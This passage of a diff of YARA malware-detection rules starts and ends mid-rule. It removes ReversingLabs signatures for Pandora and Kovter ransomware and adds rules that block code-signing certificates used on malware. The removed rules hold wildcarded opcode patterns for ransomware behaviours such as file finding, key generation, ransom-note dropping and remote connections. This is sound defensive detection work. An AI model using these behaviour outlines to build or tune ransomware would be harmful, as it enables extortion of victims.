-            ?? ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA
-            C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? ?? 29 C1 89 C8 8D 88 ?? ?? ?? ??
-            48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48
-            8B 05 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
-            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 95 ?? ?? ??
-            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 48
-            8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
-            ?? 8B 8D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 41 89 C8 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B8
-            ?? ?? ?? ?? 44 8D 40 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
-            ?? 49 89 C9 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 85 C0
-        }
-		$remote_connection_p2 = {
-            74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
-            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48
-            8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1
-            48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1
-            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
-            48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ??
-            ?? ?? ?? FF D0 0F B6 85 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ??
-            ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0
-            48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 C7 44 24 ??
-            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 C0 48 8B 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15
-            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B
-            05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5D C3
-        }
-		$find_files = {
-            48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 ?? 0F 95 C0 84 C0 74 ?? BB ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ??
-            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C2 48 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ??
-            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ??
-            ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 10 48 83 EA ?? 48 8B 12
-            48 01 D0 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? E9 ?? ?? ?? ?? 90 E9
-            ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Theravada Solutions Ltd" and pe.signatures [ i ] . serial == "02:ea:f2:7e:6f:15:75:e3:65:fc:7f:e4:e0:be:43:f7" and 1562889600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Pandora : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Pandora ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "18182bbe-1678-5d0b-a7ee-80c4bbaee99e"
-		date = "2022-06-01"
-		modified = "2022-06-01"
+		id = "64350364-fe74-54df-886d-1197146e00e7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Pandora.yara#L1-L95"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6576bde36ae9a9bc2e9dd878db788c608083b84d96d31e6898f48a264c6b7f1a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16510-L16526"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7f2a6c61ae82fec6829924d11190da776aebdd3d72c7e001fdc29b215649261c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Pandora"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC ?? 48 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? 45 31 F6 41 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 89 4C 24 ?? 45 31 C0 41 81 FA ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F
-            4C CA 41 0F 94 C0 48 8B 8C 08 ?? ?? ?? ?? 48 01 F1 31 D2 31 DB 41 81 FA ?? ?? ?? ??
-            0F 9C C2 0F 95 C3 41 BD ?? ?? ?? ?? 49 29 D5 41 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 0F 4C FA 4C 8D 4C 9B ?? 41 BB ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 0F 44 DA
-            49 83 C8 ?? 31 DB 31 D2 41 81 FA ?? ?? ?? ?? 0F 9C C3 4C 8D 64 1B ?? 0F 94 C2 48 83
-            F2 ?? 31 DB 41 81 FA ?? ?? ?? ?? 0F 94 C3 48 8D 1C DB 48 83 C3 ?? EB ?? 0F 1F 40 ??
-            4A 8B AC C0 ?? ?? ?? ?? 48 01 F5 FF E5 FF E1 4A 8B AC E0 ?? ?? ?? ?? 48 01 F5 FF E5
-            48 8B AC D8 ?? ?? ?? ?? 48 01 F5 FF E5 0F 1F 80 ?? ?? ?? ?? 48 8B AC F8 ?? ?? ?? ??
-            48 01 F5 FF E5 4A 8B AC E8 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC D8 ?? ?? ?? ?? 48 01
-        }
-		$find_files_p2 = {
-            F5 FF E5 66 0F 1F 84 00 ?? ?? 00 00 48 8B AC D0 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC
-            C8 ?? ?? ?? ?? 48 01 F5 FF E5 44 89 74 24 ?? 48 63 4C 24 ?? 48 8B 54 24 ?? 48 8B 8C
-            CA ?? ?? ?? ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 8B 54 24 ?? BD ?? ?? ?? ?? 01 EA 44 8B
-            54 24 ?? BD ?? ?? ?? ?? 41 01 EA 66 83 39 ?? 44 0F 45 D2 E9 ?? ?? ?? ?? 45 31 FF EB
-            ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 90 41 BF ?? ?? ?? ?? 44 8B 54 24 ?? 41 81 C2 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 44 8B 74 24 ?? 41 83 C6 ?? 48 8B 54
-            24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 01 C8 48 8B 4C 24
-            ?? FF D0 8B 4C 24 ?? BA ?? ?? ?? ?? 01 D1 44 8B 54 24 ?? BA ?? ?? ?? ?? 41 01 D2 85
-            C0 44 0F 44 D1 E9 ?? ?? ?? ?? 44 89 F8 48 83 C4 ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41
-            5F C3
-        }
-		$generate_key = {
-            41 57 41 56 41 55 41 54 56 57 55 53 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48
-            8D B4 24 ?? ?? ?? ?? 48 89 74 24 ?? 48 8B 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 C7 C5 ??
-            ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 41 BC ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 01
-            E1 BA ?? ?? ?? ?? 48 03 15 ?? ?? ?? ?? FF D0 48 8B 05 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F
-            B7 90 ?? ?? ?? ?? 66 89 51 ?? 48 8B 80 ?? ?? ?? ?? 48 89 01 48 8B 05 ?? ?? ?? ?? 48
-            8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? ??
-            48 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ??
-            ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 89 F1 FF D0 48 98 4C 8B 05 ?? ?? ?? ?? 4D 01 E0
-            48 8B 0D ?? ?? ?? ?? 48 8B 99 ?? ?? ?? ?? 48 01 EB 48 8B 0D ?? ?? ?? ?? 4C 01 E1 48
-            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 49 89 F1 FF D3 89 84 24 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            45 31 ED 41 BE ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ??
-            BA ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 44 D7 48 8B 04 10 4C 01 F0 FF E0
-        }
-		$drop_ransom_note = {
-            48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ??
-            ?? BE ?? ?? ?? ?? 48 01 F1 48 8B 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 01 FA FF D0 48 8B
-            0D ?? ?? ?? ?? 48 01 F1 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 01 EA FF D2 48
-            8B 15 ?? ?? ?? ?? 48 01 F2 48 8B 8C 24 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B B6 ??
-            ?? ?? ?? 48 01 EE 48 C7 44 24 ?? ?? ?? ?? ?? 41 89 C0 4C 8D 4C 24 ?? FF D6 BE ?? ??
-            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 41 BE ?? ??
-            ?? ?? 48 01 EA FF D2 BF ?? ?? ?? ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
-            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
-            E0 8B 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
-            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
-            E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ??
-            BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01
-            C1 C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ??
-            ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ??
-            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 4C 01 F0 C7 44 24 ?? ?? ?? ?? ?? 48 8D
-            54 24 ?? 4C 8D 84 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? FF D0 BF ?? ?? ?? ?? 8B 54 24 ?? B9
-            ?? ?? ?? ?? 01 CA 8B 4C 24 ?? BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ??
-            48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 31 C0 48 81
-            C4 ?? ?? ?? ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE5\\x87\\x8C\\xE4\\xBC\\xAF\\xE4\\xB9\\x90\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "6e:b0:2a:c2:be:b9:61:1e:d5:7e:b1:2e" and 1585023767 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Kovter : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Kovter ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9362ac5a-0b6c-5ac5-ac2b-59dcc1191dc6"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "f6a63e79-4dde-590f-ad65-ba9cc29ff48c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Kovter.yara#L1-L141"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3082e036b54a73ce8397cfa6e8dc2a807c587d9f17286e75af6cdbe622fae1e1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16528-L16544"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bbc3e740d5043d1811ff44c7366c69192fb78c95215b30fd4f4c782812ad591c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Kovter"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 8B 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 80 38 ?? 74
-            ?? 8B CE 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 C0
-            89 45 ?? 33 C0 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 75 ?? B3 ?? 8D 45 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
-            ?? ?? ?? 5A 2B C2 83 C0 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ??
-            8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D
-            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ??
-            8B D0 42 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
-        }
-		$remote_connection_2 = {
-            45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0D ?? ??
-            ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
-            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ??
-            ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ??
-            83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF
-            0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
-            ?? 0D ?? ?? ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50
-            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8
-            85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
-        }
-		$remote_connection_3 = {
-            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ??
-            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
